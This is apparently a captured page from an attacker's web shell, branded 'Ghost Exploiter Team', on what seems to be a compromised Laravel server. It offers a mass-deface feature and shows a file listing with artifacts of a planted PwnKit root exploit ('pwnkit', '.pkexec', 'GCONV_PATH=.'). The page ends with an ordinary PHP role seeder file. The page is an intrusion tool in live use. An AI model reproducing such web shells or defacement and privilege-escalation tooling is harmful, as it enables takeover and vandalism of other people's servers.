Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
.scribe
/
endpoints.cache
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.pkexec
--
ren
GCONV_PATH=.
--
ren
.mad-root
0KB
edt
ren
ArticleToGroup.php
0.453KB
edt
ren
Dto.php
6.402KB
edt
ren
Permission.php
0.239KB
edt
ren
RoleTableSeeder-2026012
...
1.04KB
edt
ren
RoleTableSeeder.php
1.04KB
edt
ren
api-20260128133123.php
1.377KB
edt
ren
api.php
1.377KB
edt
ren
app.php
4.229KB
edt
ren
auth.php
0KB
edt
ren
debugbar.php
13.946KB
edt
ren
default.conf
0KB
edt
ren
index.html
0.435KB
edt
ren
phpunit-20260128113505.xml
0KB
edt
ren
pwnkit
10.992KB
edt
ren
pwnkit-20260128075612.
0KB
edt
ren
web.php
0.112KB
edt
ren
<?php declare(strict_types=1); namespace Database\Seeders; use App\Domain\Users\UserService; use App\Enums\RoleEnum; use App\Models\System; use App\Models\User; use Illuminate\Database\Seeder; final class RoleTableSeeder extends Seeder { /** * Run the database seeds. */ public function run(): void { /** * @var UserService $service */ $service = app()->make(UserService::class); $roles = [ //'admin', // Супер-пользователь RoleEnum::ACCOUNTANT, // Бухгалтер RoleEnum::MODERATOR, // Согласование RoleEnum::COLLABORATOR // Сотрудник ]; $users = User::query()->where('email', '!=', 'replay@top-it.ru')->get(); $models = System::query()->get(); foreach ($users as $index => $user) { $role = $roles[$index % count($roles)]; foreach ($models as $model) { $service->assignRole($user, $role, $model->id); } } } }